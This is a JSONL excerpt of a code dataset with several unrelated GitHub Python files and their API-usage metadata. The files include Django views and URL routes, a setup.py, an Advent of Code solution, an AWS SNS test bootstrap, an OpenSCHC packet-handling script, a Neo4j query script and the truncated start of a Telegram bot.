"setuptools.build_meta.build_editable", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 61, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 68, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 68, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_sdist", "line_number": 69, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_wheel", "line_number": 77, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 77, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 90, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 90, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 96, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 96, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 97, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 97, "usage_type": "name"}]}
+{"seq_id": "713246750", "text": "from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom .serializers import ReceitaSerializer\nfrom .models import Receita\nfrom rest_framework import status\n\ndef index(request):\n return HttpResponse(\"Olá mundo! Este é o app notes de Tecnologias Web do Insper.\")\n\n# GET\n@api_view(['GET', 'POST', 'DELETE'])\ndef api_receita(request, receita_id):\n try:\n receita = Receita.objects.get(id=receita_id)\n except Receita.DoesNotExist:\n raise Http404()\n\n if request.method == 'POST':\n new_receita_data = request.data\n receita.title = new_receita_data['title']\n receita.content = new_receita_data['ingredients']\n receita.content = new_receita_data['preparo']\n receita.save()\n\n\n if request.method == 'DELETE':\n receita.delete()\n return Response(status.HTTP_204_NO_CONTENT)\n\n serialized_receita = ReceitaSerializer(receita)\n return Response(serialized_receita.data)\n\n\n#\n@api_view(['GET','POST'])\ndef api_receita_list(request):\n\n if request.method == \"POST\":\n new_receita_data = request.data\n receita = Receita()\n receita.title = new_receita_data['title']\n receita.ingredients = new_receita_data['ingredients']\n receita.preparo = new_receita_data['preparo']\n receita.save()\n\n receitas = Receita.objects.all()\n serialized_receitas = ReceitaSerializer(receitas, many=True)\n return Response(serialized_receitas.data)\n\n", "repo_name": "rodrigonigri/TecWeb-Projeto3-backend", "sub_path": "receita/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1550, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Receita.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Receita.DoesNotExist", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 17, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Receita", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Receita.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 48, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "28507254755", "text": "from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as file:\n readme = file.read()\n file.close()\n\nwith open(\"CHANGELOG.md\", \"r\") as file:\n readme += \"\\n\\n\"\n readme += file.read()\n file.close()\n\nsetup(\n name=\"aiodown\",\n version=\"1.0.7\",\n packages=find_packages(),\n install_requires=[\n \"async-files >= 0.4\",\n \"httpx[http2] >= 0.20\",\n \"humanize >= 3.2.0\",\n ],\n url=\"https://github.com/AmanoTeam/aiodown\",\n python_requires=\">=3.8\",\n author=\"AmanoTeam\",\n author_email=\"contact@amanoteam.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Topic :: Internet\",\n ],\n description=\"A fully async file downloader with httpx\",\n download_url=\"https://github.com/AmanoTeam/aiodown/releases/latest\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"python, downloader, async, asyncio, httpx, file\",\n project_urls={\n \"Bug report\": \"https://github.com/AmanoTeam/aiodown/issues\",\n \"Donate\": \"https://liberapay.com/AmanoTeam\",\n \"Source\": \"https://github.com/AmanoTeam/aiodown\",\n },\n)\n", "repo_name": "AmanoTeam/aiodown", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "32939602732", "text": "from pathlib import Path\n\n\ndef part_1() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n match = {\n \"X\": \"A\",\n \"Y\": \"B\",\n \"Z\": \"C\",\n }\n wins = {\n \"X\": \"C\", # rock beats scissors\n \"Y\": \"A\", # paper beats rock\n \"Z\": \"B\", # scissors beats paper\n }\n\n base_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if match[p2] == p1:\n total_score += 3 + base_score[p2]\n print(\"draw\")\n elif wins[p2] == p1:\n total_score += 6 + base_score[p2]\n print(\"win\")\n else:\n total_score += base_score[p2]\n print(\"loss\")\n return total_score\n\n\ndef part_2() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n loser_hands = {\n \"A\": \"C\", # rock beats scissors\n \"B\": \"A\", # paper beats rock\n \"C\": \"B\", # scissors beats paper\n }\n winner_hands = {\n \"C\": \"A\", # rock beats scissors\n \"A\": \"B\", # paper beats rock\n \"B\": \"C\", # scissors beats paper\n }\n\n base_score = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n }\n translate = {\n \"A\": \"rock\",\n \"B\": \"paper\",\n \"C\": \"scissors\",\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if p2 == \"Z\": # win\n winner_hand = winner_hands[p1]\n total_score += 6 + base_score[winner_hand]\n print(\n f\"must win, pick {translate[winner_hand]} against {translate[p1]}\"\n )\n elif p2 == \"X\": # lose\n loser_hand = loser_hands[p1]\n total_score += 0 + base_score[loser_hand]\n print(\n f\"must lose, pick {translate[loser_hand]} against {translate[p1]}\"\n )\n else: # draw\n total_score += 3 + base_score[p1]\n print(f\"must draw, pick {translate[p1]} against {translate[p1]}\")\n return total_score\n\n\nif __name__ == \"__main__\":\n print(part_1())\n print(part_2())\n", "repo_name": "rbusquet/advent-of-code", "sub_path": "aoc_2022/day02.py", "file_name": "day02.py", "file_ext": "py", "file_size_in_byte": 2461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "23349204010", "text": "import logging\n\nfrom acktest.bootstrapping import Resources, BootstrapFailureException\nfrom acktest.bootstrapping.sqs import Queue\nfrom acktest.bootstrapping.sns import Topic\nfrom acktest.aws.identity import get_region, get_account_id\n\nfrom e2e import bootstrap_directory\nfrom e2e.bootstrap_resources import BootstrapResources\n\ntopic1 = Topic(name_prefix=\"subscribe-topic\")\ntopic2 = Topic(name_prefix=\"adoption-subscribe-topic\")\n\nqueue_policy = \"\"\"{\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"sns.amazonaws.com\"\n },\n \"Action\": \"sqs:SendMessage\",\n \"Resource\": \"arn:aws:sqs:$REGION:$ACCOUNT_ID:$NAME\",\n \"Condition\": {\n \"ArnEquals\": {\n \"aws:SourceArn\": \"arn:aws:sns:$REGION:$ACCOUNT_ID:$TOPIC_NAME\"\n }\n }\n }\n ]\n}\n\"\"\"\n\nqueue1_policy_vars = {\n \"$TOPIC_NAME\": topic1.name,\n}\n\nqueue2_policy_vars = {\n \"$TOPIC_NAME\": topic2.name,\n}\n\ndef service_bootstrap() -> Resources:\n logging.getLogger().setLevel(logging.INFO)\n\n resources = BootstrapResources(\n Topic1=topic1,\n Topic2=topic2,\n Queue1=Queue(\n name_prefix=\"subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue1_policy_vars,\n ),\n Queue2=Queue(\n name_prefix=\"adoption-subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue2_policy_vars,\n ),\n )\n\n try:\n resources.bootstrap()\n except BootstrapFailureException as ex:\n exit(254)\n\n return resources\n\nif __name__ == \"__main__\":\n config = service_bootstrap()\n # Write config to current directory by default\n config.serialize(bootstrap_directory)\n", "repo_name": "aws-controllers-k8s/sns-controller", "sub_path": "test/e2e/service_bootstrap.py", "file_name": "service_bootstrap.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 11, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 42, "usage_type": "attribute"}, {"api_name": "e2e.bootstrap_resources.BootstrapResources", "line_number": 44, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 47, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 52, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.BootstrapFailureException", "line_number": 61, "usage_type": "name"}, {"api_name": "acktest.bootstrapping.Resources", "line_number": 41, "usage_type": "name"}, {"api_name": "e2e.bootstrap_directory", "line_number": 69, "usage_type": "argument"}]}
+{"seq_id": "337553348", "text": "import os\nimport sys\nsys.path.insert(0, '../..')\nimport binascii\nimport pprint\n\n# ----- SCHC ------\n\n\nfrom gen_rulemanager import *\nfrom compr_parser import *\nfrom gen_utils import dprint, dpprint\n\n\n# ----- scapy -----\n\nfrom kamene.all import *\n\nimport ipaddress\n\nclass debug_protocol:\n def _log(*arg):\n dprint(*arg)\n\nP = Parser(debug_protocol)\nRM = RuleManager()\n\ndef AnalyzePkt(packet):\n global RM\n \n dprint(len(packet), \"\".join([\"%02x\"%_ for _ in bytes(packet)]))\n\n withoutL2 = bytes(packet)\n\n print (\"\".join([\"%02x\"%_ for _ in withoutL2]))\n try:\n fields, data = P.parse(withoutL2, direction=T_DIR_DW)\n except:\n print (\"not a parsable packet\")\n return\n \n dpprint(fields)\n dprint(data)\n \n rule,dev_id = RM.FindRuleFromPacket(fields, direction=T_DIR_DW)\n pprint.pprint (rule)\n\n if rule == None:\n return\n \n if \"Action\" in rule:\n if rule[T_ACTION] == T_ACTION_PPING:\n print (\"proxy ping\")\n\n print (hex(fields[(T_IPV6_DEV_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_DEV_IID, 1)][0]))\n print (hex(fields[(T_IPV6_APP_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_APP_IID, 1)][0]))\n\n IPv6Src = (fields[(T_IPV6_DEV_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_DEV_IID, 1)][0]\n IPv6Dst = (fields[(T_IPV6_APP_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_APP_IID, 1)][0]\n\n\n IPv6SrcStr = ipaddress.IPv6Address(IPv6Src)\n IPv6DstStr = ipaddress.IPv6Address(IPv6Dst)\n\n IPv6Header = IPv6 (\n version = fields[(T_IPV6_VER, 1)][0],\n tc = fields[(T_IPV6_TC, 1)][0],\n fl = fields[(T_IPV6_FL, 1)][0],\n nh = fields[(T_IPV6_NXT, 1)][0],\n hlim = 30,\n src = IPv6SrcStr.compressed,\n dst = IPv6DstStr.compressed\n )\n\n txt = \"SCHC device is alive\"\n\n Echo = ICMPv6EchoReply(\n id = fields[(T_ICMPV6_IDENT, 1)][0],\n seq = fields[(T_ICMPV6_SEQNB, 1)][0],\n data = data\n #data = txt.encode() + data[len(txt):]\n )\n\n myMessage = IPv6Header / Echo\n myMessage.show()\n send (myMessage, iface=\"he-ipv6\")\n else:\n pass #should compresss\n \nif __name__ == '__main__':\n\n print (sys.argv)\n\n RM = RuleManager()\n RM.Add(file=\"example/comp-rule-100.json\")\n\n sniff (filter=\"ip6\", prn=AnalyzePkt, iface=\"he-ipv6\")\n", "repo_name": "openschc/openschc", "sub_path": "src/net_compression.py", "file_name": "net_compression.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "gen_utils.dprint", "line_number": 23, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 31, "usage_type": "call"}, {"api_name": "gen_utils.dpprint", "line_number": 42, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 43, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 46, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 64, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]}
+{"seq_id": "8116064835", "text": "from py2neo import Graph\r\n\r\ng = Graph(\"http://localhost:7474\", username=\"neo4j\", password=\"cooperck890303\")\r\nnum_limit = 20\r\n\r\n\r\nprint(1)\r\nqueries = [\"MATCH (m:project)-[r:contains_unit]->(n:unit) where m.id = '{0}' RETURN m.name, r.name, n.name, n.id\".format('DX-01')]\r\nprint(queries)\r\nanswers = []\r\nress = g.run(queries[0]).data()\r\nprint(ress)\r\nanswers += ress\r\nprint(answers)\r\n# unit_id = answers[0]['n.id']\r\n# print('unit_id',unit_id)\r\nprocess_id=[] # 存储流程id\r\nfor i in answers:\r\n sql_1 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where c.id = '{0}' RETURN a.id\".format(i['n.id'])]\r\n print(sql_1)\r\n ress_1 = g.run(sql_1[0]).data() # [{'a.id':XXX}]\r\n if len(ress_1) == 0:\r\n break\r\n#print(i['n.id'])\r\nprocess_id.append(i['n.id'])#输入第一个单元的id\r\n#print(process_id)\r\na = process_id[0]\r\nfor j in answers:\r\n sql_2 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where a.id = '{0}' RETURN c.id\".format(a)]\r\n print(sql_2)\r\n ress_2 = g.run(sql_2[0]).data()#[{'c.id':XXX}]\r\n if len(ress_2) ==0:\r\n break\r\n b=ress_2[0]['c.id']\r\n process_id.append(b)\r\n a=b\r\nprint(process_id) #得��按顺序的单元id\r\n# 下面找出单元id对应的单元名称\r\nprocess_name=[]\r\nfor k in process_id:\r\n sql_3 = [\"MATCH (a:unit) where a.id = '{0}' RETURN a.name\".format(k)]\r\n ress_3 = g.run(sql_3[0]).data() # [{'a.name':XXX}]\r\n n=ress_3[0]['a.name']\r\n process_name.append(n)\r\nprint(process_name)\r\nx='工艺流程为:{0}'.format('-->'.join(list(set(process_name))))\r\nprint(x)", "repo_name": "cooperck/QA_ReuseWater_KG", "sub_path": "test03.py", "file_name": "test03.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "py2neo.Graph", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "74516053609", "text": "from django.urls import path\nfrom django.contrib.auth import views as auth_views\n\n\nfrom imdb_api.views.main import frontpage, dashboard, admin_dashboard\nfrom imdb_api.views.signup import signup\nfrom imdb_api.views.login_view import login_view, logout_view\nfrom imdb_api.views.movies_view import (\n all_movies, new_movies, movie_details_with_trailers,\n movie_details, movie_search, base_genre_movies, genre_movies, dash_movie_search, genre_list\n )\nfrom imdb_api.views.movie_serializer_view import MovieView\nfrom imdb_api.views.genre_serializer_view import GenresView\nfrom imdb_api.views.user_recommendations import user_recommendations\n\nfrom imdb_api.views.admin_panel_view import AdminView\nfrom imdb_api.views.user_panel_view import vote_for_movie, toggle_favorite, user_update_profile, CommentView\n\n\napp_name = \"imdb\"\nurlpatterns = [\n path(\"\", frontpage, name='frontpage'),\n\n # path for user dashboard\n path(\"dashboard/\", dashboard, name='dashboard'),\n path('movie_search/', movie_search, name='movie_search'),\n path('dash_movie/', dash_movie_search, name='dash_movie_search'),\n path('user_update_profile/', user_update_profile, name='user_update_profile'),\n \n # path for admin dashboard\n path('admin_dashboard/', admin_dashboard, name='admin_dashboard'),\n path('update_profile//', AdminView.update_user_profile, name='update_profile'),\n path('see_all_users/', AdminView.see_all_users, name='see_all_users'),\n path(\"delete_user//\", AdminView.delete_user, name=\"del_user\"),\n path('see_all_genres/', AdminView.see_all_genres, name='see_all_genres'),\n path('add_genre/', AdminView.add_genre, name='add_genre'),\n path(\"delete_genre//\", AdminView.delete_genre, name=\"del_genre\"),\n path('see_all_movies/', AdminView.see_all_movies, name='see_all_movies'),\n path('add_movie_not_authomatic/', AdminView.add_movie_not_authomatic, name='add_movie_not_authomatic'),\n path(\"update_movie//\", AdminView.update_movie, name=\"update_movie\"),\n # path for Signup, Login, Logout\n path(\"signup/\", signup, name=\"signup\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path('recommendations/', user_recommendations, name='user_recommendations'),\n path('vote_for_movie//', vote_for_movie, name='vote_for_movie'),\n path('toggle_favorite//', toggle_favorite, name='toggle_favorite'),\n\n # path for all movie infos.\n path('all_movies/', all_movies, name='all_movies'),\n path('new_movies', new_movies, name='new_movies'),\n path('movie_details//', movie_details, name='movie_details'),\n path('detail&trailer//', movie_details_with_trailers, name='detail&trailer'),\n path('genre_movies//', genre_movies, name='genre_movies'),\n path('base_genre_movies//', base_genre_movies, name='base_genre_movies'),\n path('genres/', genre_list, name='genre_list'),\n \n # path for comments\n path('comment//', CommentView.as_view(), name='comment'),\n \n # APIs for movies\n path(\"apis/movies/\", MovieView.as_view(), name=\"apis_movies\"),\n path(\"apis/movies//\", MovieView.as_view(), name=\"apis_movies\"),\n # APIs for genres\n path(\"apis/genres/\", GenresView.as_view(), name=\"genres\"),\n path(\"apis/genres//\", GenresView.as_view(), name=\"genre\"),\n \n\n\n]\n\n \n \n\n\n", "repo_name": "MarcinIgna/imdb-django-api", "sub_path": "imdb_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", 
"pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "imdb_api.views.main.frontpage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "imdb_api.views.main.dashboard", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_search", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.dash_movie_search", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.user_update_profile", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "imdb_api.views.main.admin_dashboard", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_user_profile", "line_number": 32, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_users", "line_number": 33, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_user", "line_number": 34, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_genres", "line_number": 35, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_genre", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_genre", "line_number": 37, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_movies", "line_number": 38, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_movie_not_authomatic", "line_number": 39, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": 
"imdb_api.views.admin_panel_view.AdminView.update_movie", "line_number": 40, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "imdb_api.views.signup.signup", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.login_view", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.logout_view", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "imdb_api.views.user_recommendations.user_recommendations", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.vote_for_movie", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.toggle_favorite", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.all_movies", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.new_movies", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details_with_trailers", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_movies", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.base_genre_movies", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_list", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", 
"line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "70772349287", "text": "import os\nimport time\nimport random\nimport logging\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\nfrom info import START_MSG, CHANNELS, ADMINS, AUTH_CHANNEL, CUSTOM_FILE_CAPTION\nfrom utils import Media, get_file_details\nfrom pyrogram.errors import UserNotParticipant\nfrom db.mongo import insert, getid\nlogger = logging.getLogger(__name__)\n\nPHOTO = [\n \"https://telegra.ph/file/d053a8e9ef4ed93df38a0.jpg\",\n \"https://telegra.ph/file/d1c6ee6d32e142f3674ed.jpg\", \n \"https://telegra.ph/file/8fd7710ee17bd34a963a5.jpg\", \n \"https://telegra.ph/file/ecb7510e187f0e3b60852.jpg\", \n \"https://telegra.ph/file/ef7f1cbc33ac9ee47578d.jpg\", \n \"https://telegra.ph/file/a5ce5774734d8c119c630.jpg\"\n]\n\n@Client.on_message(filters.private & filters.user(ADMINS) & filters.command([\"broadcast\"]))\nasync def broadcast(bot, message):\n if (message.reply_to_message):\n ms = await message.reply_text(\"Geting All ids from database ...........\")\n ids = getid()\n tot = len(ids)\n await ms.edit(f\"Starting Broadcast .... \\n Sending Message To {tot} Users\")\n for id in ids:\n try:\n \tawait message.reply_to_message.copy(id)\n except:\n \tpass\n\n\n@Client.on_message(filters.command(\"start\"))\nasync def start(bot, cmd):\n usr_cmdall1 = cmd.text\n if usr_cmdall1.startswith(\"/start subinps\"):\n if AUTH_CHANNEL:\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n try:\n user = await bot.get_chat_member(int(AUTH_CHANNEL), cmd.from_user.id)\n if user.status == \"kicked\":\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Sorry Sir, You are Banned to use me.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n except UserNotParticipant:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"** 🔊 𝗝𝗼𝗶𝗻 𝗢𝘂𝗿 